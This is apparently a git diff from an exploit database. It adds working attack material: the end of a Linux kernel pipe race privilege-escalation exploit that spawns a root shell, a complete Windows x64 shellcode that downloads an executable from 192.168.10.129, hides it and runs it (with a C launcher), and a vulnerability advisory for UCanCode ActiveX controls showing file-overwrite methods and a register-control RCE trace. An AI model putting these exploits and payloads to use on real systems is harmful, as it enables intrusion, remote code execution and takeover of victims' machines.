0xdead4ead; + /* makes list_head empty for wake_up_common */ + info_older->next = &info_older->next; + info_older->readers = 1; + info_older->writers = 1; + info_older->nrbufs = 1; + info_older->curbuf = 1; + /* we'll get called multiple times from free_pipe_info + but it's ok because own_the_kernel handles this case + */ + for (i = 0; i < PIPE_BUFFERS; i++) + info_older->bufs[i].ops = (void *)ops; + } else { + /* + different ballgame here, instead of being able to + provide a function pointer in the ops table, you + control a base address used to compute the address for + a copy into the kernel via copy_from_user. The + following should get you started. + */ + /* lookup symbol for writable fptr then trigger it later + change the main write in the one thread to write out + pointers with the value of exp_state->exploit_kernel + */ + info_oldest->base = (char *)0xc8000000; + info_oldest->readers = 1; + info_oldest->writers = 1; + return 0; + } + + ops->can_merge = 1; + for (i = 0; i < 16; i++) + ((void **)&ops->map)[i] = exp_state->own_the_kernel; + + return 0; +} + +int requires_null_page = 1; + +int get_exploit_state_ptr(struct exploit_state *ptr) +{ + exp_state = ptr; + return 0; +} + +int trigger(void) +{ + char buf[128]; + int fd; + int i = 0; + + /* ignore sigpipe so we don't bail out early */ + signal(SIGPIPE, SIG_IGN); + + start_thread(go_go_speed_racer, NULL); + + fprintf(stdout, " [+] We'll let this go for a while if needed...\n"); + fflush(stdout); + + while (!exp_state->got_ring0 && i < 10000000) { + fd = pipefd[1]; + sprintf(buf, "/proc/self/fd/%d", fd); + fd = open(buf, O_WRONLY | O_NONBLOCK); + if (fd >= 0) { + /* bust spinlock */ + *(unsigned int *)NULL = is_old_kernel ? 0 : 1; + write(fd, ".", 1); + close(fd); + } + i++; + } + + if (!exp_state->got_ring0) { + fprintf(stdout, " [+] Failed to trigger the vulnerability. Is this a single processor machine with CONFIG_PREEMPT_NONE=y?\n"); + return 0; + } + + return 1; +} + +int post(void) +{ +// return RUN_ROOTSHELL; + return FUNNY_PIC_AND_ROOTSHELL; +} \ No newline at end of file diff --git a/platforms/linux/local/744.c b/platforms/linux/local/744.c index ae479dec0..99cb9f69e 100755 --- a/platforms/linux/local/744.c +++ b/platforms/linux/local/744.c @@ -1,3 +1,7 @@ +/* +* EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/ +*/ + /* * binfmt_elf uselib VMA insert race vulnerability * v1.08 diff --git a/platforms/linux/local/778.c b/platforms/linux/local/778.c index 8e26eab25..6b9906101 100755 --- a/platforms/linux/local/778.c +++ b/platforms/linux/local/778.c @@ -1,3 +1,7 @@ +/* +* EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/ +*/ + /* * Linux kernel 2.4 uselib() privilege elevation exploit. * diff --git a/platforms/win_x86-64/shellcode/40821.c b/platforms/win_x86-64/shellcode/40821.c new file mode 100755 index 000000000..14c806d5c --- /dev/null +++ b/platforms/win_x86-64/shellcode/40821.c @@ -0,0 +1,332 @@ +/* + + # Title : Windows x64 Download+Execute Shellcode + # Author : Roziul Hasan Khan Shifat + # Date : 24-11-2016 + # size : 358 bytes + # Tested on : Windows 7 x64 Professional + # Email : shifath12@gmail.com + + + + +*/ + + + + +/* + + +section .text + global _start +_start: + + +;----------------------------- + +sub rsp,88 + +lea r14,[rsp] +sub rsp,88 + + +;------------------------------------------------ + + +xor rdx,rdx +mov rax,[gs:rdx+0x60] ;PEB +mov rsi,[rax+0x18] ;PEB.Ldr +mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList +lodsq +mov rsi,[rax] +mov rdi,[rsi+0x30] ;kernel32.dll base address + +;--------------------------------------------------- + + +mov ebx,[rdi+0x3c] ;elf_anew +add rbx,rdi +mov dl,0x88 +mov ebx,[rbx+rdx] +add rbx,rdi + +mov esi,[rbx+0x1c] +add rsi,rdi +;-------------------------------------------------- + +;loading urlmon.dll + +mov dx,831 +mov ebx,[rsi+rdx*4] +add rbx,rdi + +xor rdx,rdx + + +mov [r14],dword 'urlm' +mov [r14+4],word 'on' +mov [r14+6],byte dl + +lea rcx,[r14] + + + +call rbx + + +mov dx,586 +mov ebx,[rsi+rdx*4] +add rbx,rdi + +xor rdx,rdx + +mov rcx,'URLDownl' +mov [r14],rcx +mov rcx,'oadToFil' +mov [r14+8],rcx +mov [r14+16],word 'eA' +mov [r14+18],byte dl + + +lea rdx,[r14] +mov rcx,rax + +call rbx +;;;;;;;;;;;;;;;;;;;;;;------------------------------------- + +mov r15,rax + +;------------------------------------------------ +;save as 'C:\\Users\\Public\\p.exe' length: 24+1 + +mov rax,'C:\\User' +mov [r14],rax +mov rax,'s\\Publi' +mov [r14+8],rax +mov rax,'c\\p.exe' +mov [r14+16],rax + +xor rdx,rdx +mov [r14+24],byte dl + + +;---------------------------------------- + + +lea rcx,[r14+25] + + +;url "http://192.168.10.129/pl.exe" length: 28+1 + +mov rax,'http://1' +mov [rcx],rax +mov rax,'92.168.1' +mov [rcx+8],rax +mov rax,'0.129/pl' +mov [rcx+16],rax +mov [rcx+24],dword '.exe' +mov [rcx+28],byte dl + + +;--------------------------------------------------- + +sub rsp,88 + + +download: +xor rcx,rcx +lea rdx,[r14+25] +lea r8,[r14] +xor r9,r9 +mov [rsp+32],r9 + +call r15 + +xor rdx,rdx +cmp rax,rdx +jnz download + + + +;------------------------------------------------ +sub rsp,88 +;----------------------------------------------- +;hiding file + + + + +mov dx,1131 +mov ebx,[rsi+rdx*4] +add rbx,rdi ;SetFileAttributesA() + + +lea rcx,[r14] +xor rdx,rdx +mov dl,2 + +call rbx + +;------------------------------------ +;executing file +xor rdx,rdx +mov dx,1314 +mov ebx,[rsi+rdx*4] +add rbx,rdi ;WinExec() + + +lea rcx,[r14] + +xor rdx,rdx + + + +call rbx + + +;------------------------------ +xor rdx,rdx +mov dx,296 +mov ebx,[rsi+rdx*4] +add rbx,rdi + +;--------------------------------------- + +;if U use this shellcode for pe injection, then don't forget to free allocated space + +add rsp,88 +xor rcx,rcx +call rbx + + +*/ + +/* + + +Disassembly of section .text: + +0000000000000000 <_start>: + 0: 48 83 ec 58 sub $0x58,%rsp + 4: 4c 8d 34 24 lea (%rsp),%r14 + 8: 48 83 ec 58 sub $0x58,%rsp + c: 48 31 d2 xor %rdx,%rdx + f: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax + 14: 48 8b 70 18 mov 0x18(%rax),%rsi + 18: 48 8b 76 10 mov 0x10(%rsi),%rsi + 1c: 48 ad lods %ds:(%rsi),%rax + 1e: 48 8b 30 mov (%rax),%rsi + 21: 48 8b 7e 30 mov 0x30(%rsi),%rdi + 25: 8b 5f 3c mov 0x3c(%rdi),%ebx + 28: 48 01 fb add %rdi,%rbx + 2b: b2 88 mov $0x88,%dl + 2d: 8b 1c 13 mov (%rbx,%rdx,1),%ebx + 30: 48 01 fb add %rdi,%rbx + 33: 8b 73 1c mov 0x1c(%rbx),%esi + 36: 48 01 fe add %rdi,%rsi + 39: 66 ba 3f 03 mov $0x33f,%dx + 3d: 8b 1c 96 mov (%rsi,%rdx,4),%ebx + 40: 48 01 fb add %rdi,%rbx + 43: 48 31 d2 xor %rdx,%rdx + 46: 41 c7 06 75 72 6c 6d movl $0x6d6c7275,(%r14) + 4d: 66 41 c7 46 04 6f 6e movw $0x6e6f,0x4(%r14) + 54: 41 88 56 06 mov %dl,0x6(%r14) + 58: 49 8d 0e lea (%r14),%rcx + 5b: ff d3 callq *%rbx + 5d: 66 ba 4a 02 mov $0x24a,%dx + 61: 8b 1c 96 mov (%rsi,%rdx,4),%ebx + 64: 48 01 fb add %rdi,%rbx + 67: 48 31 d2 xor %rdx,%rdx + 6a: 48 b9 55 52 4c 44 6f movabs $0x6c6e776f444c5255,%rcx + 71: 77 6e 6c + 74: 49 89 0e mov %rcx,(%r14) + 77: 48 b9 6f 61 64 54 6f movabs $0x6c69466f5464616f,%rcx + 7e: 46 69 6c + 81: 49 89 4e 08 mov %rcx,0x8(%r14) + 85: 66 41 c7 46 10 65 41 movw $0x4165,0x10(%r14) + 8c: 41 88 56 12 mov %dl,0x12(%r14) + 90: 49 8d 16 lea (%r14),%rdx + 93: 48 89 c1 mov %rax,%rcx + 96: ff d3 callq *%rbx + 98: 49 89 c7 mov %rax,%r15 + 9b: 48 b8 43 3a 5c 5c 55 movabs $0x726573555c5c3a43,%rax + a2: 73 65 72 + a5: 49 89 06 mov %rax,(%r14) + a8: 48 b8 73 5c 5c 50 75 movabs $0x696c6275505c5c73,%rax + af: 62 6c 69 + b2: 49 89 46 08 mov %rax,0x8(%r14) + b6: 48 b8 63 5c 5c 70 2e movabs $0x6578652e705c5c63,%rax + bd: 65 78 65 + c0: 49 89 46 10 mov %rax,0x10(%r14) + c4: 48 31 d2 xor %rdx,%rdx + c7: 41 88 56 18 mov %dl,0x18(%r14) + cb: 49 8d 4e 19 lea 0x19(%r14),%rcx + cf: 48 b8 68 74 74 70 3a movabs $0x312f2f3a70747468,%rax + d6: 2f 2f 31 + d9: 48 89 01 mov %rax,(%rcx) + dc: 48 b8 39 32 2e 31 36 movabs $0x312e3836312e3239,%rax + e3: 38 2e 31 + e6: 48 89 41 08 mov %rax,0x8(%rcx) + ea: 48 b8 30 2e 31 32 39 movabs $0x6c702f3932312e30,%rax + f1: 2f 70 6c + f4: 48 89 41 10 mov %rax,0x10(%rcx) + f8: c7 41 18 2e 65 78 65 movl $0x6578652e,0x18(%rcx) + ff: 88 51 1c mov %dl,0x1c(%rcx) + 102: 48 83 ec 58 sub $0x58,%rsp + +0000000000000106 : + 106: 48 31 c9 xor %rcx,%rcx + 109: 49 8d 56 19 lea 0x19(%r14),%rdx + 10d: 4d 8d 06 lea (%r14),%r8 + 110: 4d 31 c9 xor %r9,%r9 + 113: 4c 89 4c 24 20 mov %r9,0x20(%rsp) + 118: 41 ff d7 callq *%r15 + 11b: 48 31 d2 xor %rdx,%rdx + 11e: 48 39 d0 cmp %rdx,%rax + 121: 75 e3 jne 106 + 123: 48 83 ec 58 sub $0x58,%rsp + 127: 66 ba 6b 04 mov $0x46b,%dx + 12b: 8b 1c 96 mov (%rsi,%rdx,4),%ebx + 12e: 48 01 fb add %rdi,%rbx + 131: 49 8d 0e lea (%r14),%rcx + 134: 48 31 d2 xor %rdx,%rdx + 137: b2 02 mov $0x2,%dl + 139: ff d3 callq *%rbx + 13b: 48 31 d2 xor %rdx,%rdx + 13e: 66 ba 22 05 mov $0x522,%dx + 142: 8b 1c 96 mov (%rsi,%rdx,4),%ebx + 145: 48 01 fb add %rdi,%rbx + 148: 49 8d 0e lea (%r14),%rcx + 14b: 48 31 d2 xor %rdx,%rdx + 14e: ff d3 callq *%rbx + 150: 48 31 d2 xor %rdx,%rdx + 153: 66 ba 28 01 mov $0x128,%dx + 157: 8b 1c 96 mov (%rsi,%rdx,4),%ebx + 15a: 48 01 fb add %rdi,%rbx + 15d: 48 83 c4 58 add $0x58,%rsp + 161: 48 31 c9 xor %rcx,%rcx + 164: ff d3 callq *%rbx + +*/ + +#include +#include +#include + + +char shellcode[]=\ + +"\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3"; + +int main() +{ +int len=strlen(shellcode); +DWORD l=0; +printf("shellcode length : %d\n",len); +VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l); +(* (int(*)()) shellcode)(); + +return 0; + +} diff --git a/platforms/windows/dos/40820.txt b/platforms/windows/dos/40820.txt new file mode 100755 index 000000000..85d7b6dc8 --- /dev/null +++ b/platforms/windows/dos/40820.txt @@ -0,0 +1,329 @@ +UCanCode multiple vulnerabilities + +Url: http://www.hmi-software.com/ + http://www.ucancode.net/index.htm + http://www.ucancode.net/bbs/zhuce/login.htm + +Description: Form vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS, Vector Graphics + and Real Time Data Visualization Graphics Source Code Kits for C/C++ and .NET software developers more than 40 countries + around the world!" + Great... 40 countries. It's time to take a look to their software! + Package name "UCanCode_Controls.zip" + After the installation, we can found these activex controls: + + --------------------------------------------- + ProgID: UCCVIEWER.UCCViewerCtrl.1 + CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C} + --------------------------------------------- + ProgID: UCCDRAW.UCCDrawCtrl.1 + CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7} + --------------------------------------------- + progID: TKDRAWCAD.TKDrawCADCtrl.1 + CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C} + --------------------------------------------- + ProgID: UCCPRINT.UCCPrintCtrl.1 + CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488} + --------------------------------------------- + ProgID: UCCDIAGRAM.UCCDiagramCtrl.1 + CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826} + --------------------------------------------- + ProgID: UCCUML.UCCUMLCtrl.1 + CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA} + --------------------------------------------- + ProgID: UCCHMI.UCCHMICtrl.1 + CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF} + --------------------------------------------- + ProgID: UCCSIMPLE.UCCSIMPLECtrl.1 + CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B} + --------------------------------------------- + and all are marked as: RegKey Safe for Script: True + RegKey Safe for Init: True + Implements IObjectSafety: False + +Author: shinnai +mail: shinnai[at]autistici[dot]org +site: http://www.shinnai.altervista.org/ +--------------------------------------------------------------------- +INSECURE METHODS: +In these coontrols there are a lot of insecure methods which can be used to overwrite +arbitrary files in user's pc. This is the complete list: + +1) various Export* methods + +Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX +Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B} +Sub ExportAsBitmapFile (ByVal strFile As String) +---------------------------------------- +Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX +Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B} +Sub ExportAsEMFFile (ByVal strFile As String) +---------------------------------------- +Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx +Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF} +Sub ExportAsBitmapFile (ByVal strFile As String) +---------------------------------------- +Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx +Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF} +Sub ExportAsEMFFile (ByVal strFile As String) +---------------------------------------- +Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx +Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA} +Sub ExportAsBitmapFile (ByVal strFile As String) +---------------------------------------- +Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx +Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA} +Sub ExportAsEMFFile (ByVal strFile As String) +---------------------------------------- +Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx +Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA} +Function ExportBitmapData (ByRef phBlob As Long, ByVal imageShape As Long) As Boolean +---------------------------------------- +Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX +Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826} +Sub ExportAsBitmapFile (ByVal strFile As String) +---------------------------------------- +Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX +Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826} +Sub ExportAsEMFFile (ByVal strFile As String) +---------------------------------------- +Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx +Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488} +Sub ExportAsBitmapFile (ByVal strFile As String) +---------------------------------------- +Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx +Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488} +Sub ExportAsEMFFile (ByVal strFile As String) +---------------------------------------- +Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX +Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C} +Sub ExportAsBitmapFile (ByVal strFile As String) +---------------------------------------- +Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX +Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C} +Sub ExportAsEMFFile (ByVal strFile As String) +---------------------------------------- +Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx +Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7} +Sub ExportAsBitmapFile (ByVal strFile As String) +---------------------------------------- +Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx +Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7} +Sub ExportAsEMFFile (ByVal strFile As String) +---------------------------------------- +Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx +Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7} +Function ExportToBitmapFile (ByVal lpszFile As String) As Boolean +---------------------------------------- +Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX +Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C} +Sub ExportAsBitmapFile (ByVal strFile As String) +---------------------------------------- +Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX +Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C} +Sub ExportAsEMFFile (ByVal strFile As String) +---------------------------------------- + +2) various Save* methods: + +---------------------------------------- +Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX +Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B} +Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean +---------------------------------------- +Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx +Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF} +Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean +---------------------------------------- +Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx +Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA} +Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean +---------------------------------------- +Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX +Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826} +Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean +---------------------------------------- +Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX +Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826} +Sub SaveToXdgFile (ByVal lpszFileName As String) +---------------------------------------- +Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX +Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826} +Function SaveTemplateToFile (ByVal strFile As String) As Boolean +---------------------------------------- +Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx +Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488} +Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean +---------------------------------------- +Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx +Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488} +Sub SaveToXdgFile (ByVal lpszFileName As String) +---------------------------------------- +Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx +Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488} +Function SaveTemplateToFile (ByVal strFile As String) As Boolean +---------------------------------------- +Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX +Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C} +Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean +---------------------------------------- +Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX +Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C} +Sub SaveToXdgFile (ByVal lpszFileName As String) +---------------------------------------- +Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX +Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C} +Function SaveTemplateToFile (ByVal strFile As String) As Boolean +---------------------------------------- +Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx +Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7} +Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean +---------------------------------------- +Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx +Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7} +Function SaveDocument (ByVal lpszFileName As String) As Boolean +---------------------------------------- +Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx +Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7} +Sub SaveToXdgFile (ByVal lpszFileName As String) +---------------------------------------- +Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX +Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C} +Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean +---------------------------------------- +Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX +Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C} +Sub SaveToXdgFile (ByVal lpszFileName As String) +---------------------------------------- +Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX +Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C} +Function SaveTemplateToFile (ByVal strFile As String) As Boolean +---------------------------------------- + +3) various Write methods: + +---------------------------------------- +Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX +Class: UCCSIMPLE {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B} +Function Write (ByVal lpszFileName As String) As Boolean +---------------------------------------- +Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx +Class: UCCHMI {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF} +Function Write (ByVal lpszFileName As String) As Boolean +---------------------------------------- +Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx +Class: UCCUML {C1F0EE85-363F-483D-97D0-87E2A537BFBA} +Function Write (ByVal lpszFileName As String) As Boolean +---------------------------------------- +Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX +Class: UCCDiagram {B6A3BF2C-F770-4182-BE7F-103BF2C76826} +Function Write (ByVal lpszFileName As String) As Boolean +---------------------------------------- +Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx +Class: UCCPrint {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488} +Function Write (ByVal lpszFileName As String) As Boolean +---------------------------------------- +Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX +Class: TKDrawCAD {9022B790-B810-45B4-80BC-2D94EEC5343C} +Function Write (ByVal lpszFileName As String) As Boolean +---------------------------------------- +Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx +Class: UCCDraw {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7} +Function Write (ByVal lpszFileName As String) As Boolean +---------------------------------------- +Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX +Class: UCCViewer {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C} +Function Write (ByVal lpszFileName As String) As Boolean +---------------------------------------- + +PROOF OF CONCEPT: + + + + + +---------------------------------------- +---------------------------------------- + +REMOTE CODE EXECUTION + +This product is so poor coded that remote code execution is possible using a lot of functions (and I'm lazy), +so here it is the description of just one of it, "AddDWordUserProperty": + +CPU Disasm +Address Hex dump Command Comments +... +... +1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36] +1007FEB9 |. 51 PUSH ECX +1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI] <- WE CAN CONTROL ESI +1007FEBC |. 52 PUSH EDX +1007FEBD |. 8BCE MOV ECX,ESI +1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0 +1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI +1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304] +1007FED4 |. 85C0 TEST EAX,EAX +... +... +Registers: +CPU - thread 9. (00000B38), module UCCVIE~1_OCX +EAX 015DD1D0 +ECX 015DD194 +EDX 015DD1D0 +EBX 00000000 +ESP 015DD188 +EBP 015DD300 +ESI 41414141 <- FIRST ARGUMENT PASSED TO AddDWordUserProperty METHOD +EDI 42424242 <- SECOND ARGUMENT PASSED TO AddDWordUserProperty METHOD +EIP 1007FEBA UCCVIE~1_OCX.1007FEBA + +---------------------------------------------------------------------- + +We can use it to pass a valid memory address so that we can find a more comfortable situation :) +CPU Disasm +Address Hex dump Command Comments +... +... +1007FEB5 |. 8D5424 44 LEA EDX,[LOCAL.36] +1007FEB9 |. 51 PUSH ECX +1007FEBA |. 8B06 MOV EAX,DWORD PTR DS:[ESI] +1007FEBC |. 52 